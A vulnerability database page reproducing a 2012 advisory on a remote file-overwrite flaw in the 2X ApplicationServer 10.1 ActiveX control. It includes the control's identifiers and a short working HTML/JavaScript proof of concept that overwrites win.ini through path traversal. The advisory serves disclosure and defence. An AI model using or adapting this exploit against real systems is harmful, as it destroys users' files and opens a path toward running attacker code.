Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

2X ApplicationServer 10.1 TuxSystem Class ActiveX Control File Overwrite

🗓️ 19 Mar 2012 00:00:00Reported by rgodType 
zdt
 zdt🔗 0day.today👁 23 Views

2X ApplicationServer 10.1 TuxSystem ActiveX Control File Overwrite Vulnerability tested against Microsoft Windows Server 2003 r2 sp2 and Internet Explorer 8. 2X Software global leader of desktop and application delivery. Vulnerability allows unsecure file operations by passing existing file path to ExportSettings method, potentially enabling remote attacker to run arbitrary code

Code
2X ApplicationServer 10.1 TuxSystem Class ActiveX Control TuxScripting.dll
ExportSettings Remote File Overwrite Vulnerability
tested against: Microsoft Windows Server 2003 r2 sp2
                Internet Explorer 8
vendor description:
"2X Software is a global leader of desktop and application delivery,
remote access and cloud computing solutions."
2x homepage: http://www.2x.com/
download url: http://www.2x.com/applicationserver/download/
file tested: 2XAppServer.msi
Background:
The mentioned product installs an ActiveX control with
the following settings:
ProgID: TuxScripting.TuxSystem.1
CLSID: {5BD64392-DA66-4852-9715-CFBA98D25296}
Binary Path C:\Program Files\2X\ApplicationServer\TuxScripting.dll
Implements IObjectSafety: Yes
Safe for Scripting: True
Safe for Initialization: ?
According to the IObjectSafety interface this control is Safe for Scripting
then Internet Explorer will allow access to the availiable methods and
properties.
Vulnerability:
Two methods perform unsecure file operations (read/write):
...
/* DISPID=13 */
    function ImportSettings(
        /* VT_BSTR [8]  */ $FileName
        )
    {
        /* method ImportSettings */
    }
    /* DISPID=14 */
    function ExportSettings(
        /* VT_BSTR [8]  */ $FileName
        )
    {
        /* method ExportSettings */
    }
...
by passing an existing file path to the ExportSettings() the
resulting file content will look like this:
<Setup xmlns:dt="urn:schemas-microsoft-com:datatypes"><Connection><CGW_FGWs dt:d
t="string"><Default></CGW_FGWs><CGW_HTTPs dt:dt="string"><Default></
CGW_HTTPs><CGW_IPs dt:dt="string">192.168.2.101:0</CGW_IPs><CGW_PUBs dt:dt="stri
ng"><Default></CGW_PUBs><Domain dt:dt="string">WORKGROUP/SERVER</Domain><I
D dt:dt="ui4">2</ID><LocalInst dt:dt="ui4">1</LocalInst><RanID dt:dt="ui4">12638
38571</RanID><SecLevAuth><ExcGWIPsLst dt:dt="string"><Default></ExcGWIPsLs
t></SecLevAuth><Server dt:dt="string">SERVER</Server></Connection><LoadBalancer>
<PersTime dt:dt="ui4">1279870543</PersTime><ServerIndex dt:dt="ui4">2</ServerInd
ex><VDIHosts><VDIHostsIndex dt:dt="ui4">2</VDIHostsIndex></VDIHosts><VDIHostsGro
up><VDIHostGroupIndex dt:dt="ui4">0</VDIHostGroupIndex></VDIHostsGroup></LoadBal
ancer><Product><Build dt:dt="ui4">1204</Build><Major dt:dt="ui4">10</Major><Mino
r dt:dt="ui4">1</Minor><Name dt:dt="string">VDS</Name></Product><Publishing><Out
putDir dt:dt="string">C:\Program Files\Internet Explorer\web\output</OutputDir><
WebPageTemplate dt:dt="string">C:\Program Files\Internet Explorer\web\2X_default
_style.xslt</WebPageTemplate></Publishing><Redundancy><BCtrls><BCtrl0001><ID dt:
dt="ui4">1</ID><Priority dt:dt="ui4">0</Priority><Server dt:dt="string">SERVER</
Server></BCtrl0001></BCtrls><IDCntr dt:dt="ui4">1</IDCntr><MasterServer dt:dt="s
tring">SERVER</MasterServer><SettingsCount dt:dt="ui4">1</SettingsCount><Setting
sID dt:dt="ui4">1326947769</SettingsID><SettingsTime dt:dt="ui4">1326947769</Set
tingsTime></Redundancy><Reporting><Rprtng2X><RprtSrv dt:dt="string"></RprtSrv></
Rprtng2X><RprtngEG><RprtSrv dt:dt="string"></RprtSrv></RprtngEG></Reporting></Se
tup>
If a remote attacker is able to take control of the file content, could also be
capable to run arbitrary code. At the time of this report, this could not be achieved yet
(I have experienced some unuseful crashes by calling ImportSettings() ...)
As attachment, proof of concept code which overwrites win.ini
POC:
<!--
2X ApplicationServer 10.1 TuxSystem Class ActiveX Control TuxScripting.dll
Remote File Overwrite Vulnerability
ActiveX settings:
ProgID: TuxScripting.TuxSystem.1
CLSID: {5BD64392-DA66-4852-9715-CFBA98D25296}
Binary Path C:\Program Files\2X\ApplicationServer\TuxScripting.dll
Implements IObjectSafety: Yes
Safe for Scripting: True
Safe for Initialization: ?
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
var obj = new ActiveXObject("TuxScripting.TuxSystem.1");
obj.ExportSettings("../../../../../../../../windows/win.ini");
</script>



#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Mar 2012 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilityactivex controlfile overwritemicrosoft windows serverinternet explorer 82x softwareremote access
23